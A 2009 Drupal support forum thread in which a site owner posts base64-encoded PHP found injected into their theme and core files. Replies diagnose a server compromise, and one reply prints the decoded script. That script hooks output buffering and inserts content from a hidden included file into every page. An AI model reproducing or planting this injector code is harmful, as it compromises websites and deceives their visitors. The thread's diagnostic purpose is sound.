Home » Forums » Support » Post installation

Embedded spam codes in PHP pages

· ·
glendac - June 27, 2009 - 16:35

I've noticed these garbage text in my pages when I look at the HTML source but they are not showing in public view. I went to my theme files (node.tpl.php. block.tpl.php, page.tpl.php, etc.) as well as main Drupal files (index.php, cron.php, install.php, update.php, etc.) and indeed the garbage code below was inserted into all these pages - at the beginning. I deleted these codes and I didn't see the garbage text in my HTML source anymore. But the codes were inserted again (both in my 5.X and 6.X installations - http://softtester.org/drupal4work and http://softtester.org) and again I deleted them. I checked the settings for my input formats in case I enabled php for anonymous users but no, I didn't. Can someone please tell me what I need to do to stop these codes getting inserted into my php pages? [The code below is actually long but it doesn't appear to wrap around...]

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9zb2Z0dGVzdC9wdWJsaWNfaHRtbC9tb29kbGUvbGliL2VkaXRvci90aW55bWNlL2pzY3JpcHRzL3RpbnlfbWNlL3RoZW1lcy9hZHZhbmNlZC9kb2NzL2VuL2ltYWdlcy9tZGxfdXRmLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL3NvZnR0ZXN0L3B1YmxpY19odG1sL21vb2RsZS9saWIvZWRpdG9yL3RpbnltY2UvanNjcmlwdHMvdGlueV9tY2UvdGhlbWVzL2FkdmFuY2VkL2RvY3MvZW4vaW1hZ2VzL21kbF91dGYucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCl7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2Qj1vcmQoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMywxKSk7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT0xMDskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPTA7aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY0KXskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPXVucGFjaygndicsc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMTAsMikpOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMVsxXTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yKyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImOCl7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYxNil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYyKXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yO30kUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPWd6aW5mbGF0ZShzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSk7aWYoJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz09PUZBTFNFKXskUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPSRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4Njg7fXJldHVybiAkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzO319ZnVuY3Rpb24gZGdvYmgoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MD1nemRlY29kZSgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7fWVsc2V7cmV0dXJuIGdtbCgpLiRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

» Login or register to post comments

Secure your server

yelvington - June 27, 2009 - 16:47

If any Web application can write to your Drupal files, your server is very badly configured.

If no Web application can write to your Drupal files and you're getting this, your server has been compromised.

Login or register to post comments

Yep, time to secure your server

Karlheinz - June 27, 2009 - 17:19

If the code is indeed in core Drupal files like node.tpl.php, then your server is compromised. If you have a webhost, I'd bring this to their attention immediately.

That "junk" code is actually running a PHP script on your server. eval executes code, and that code (decoded from Base 64) is this:

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;
if(file_exists('/home/softtest/public_html/moodle/lib/editor/tinymce/jscripts/tiny_mce/themes/advanced/docs/en/images/mdl_utf.php')){include_once('/home/softtest/public_html/moodle/lib/editor/tinymce/jscripts/tiny_mce/themes/advanced/docs/en/images/mdl_utf.php');
if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));
$R60169CD1C47B7A7A85AB44F884635E41=10;
$R0D54236DA20594EC13FC81B209733931=0;
if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];
$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;
}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;
}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;
}return $RC4A5B5E310ED4C323E04D72AFAE39F53;
}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');
$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
}}ob_start('dgobh');
}}}

Doing a search for "mdl_utf.php", I found a bunch of hits related to compromised MediaWiki and Moodle sites.

EDIT: It might possibly be a c99Madshell, or a variant:
http://www.derekfountain.org/security_c99madshell.php

-Karlheinz

Login or register to post comments
 
 

Drupal is a registered trademark of Dries Buytaert.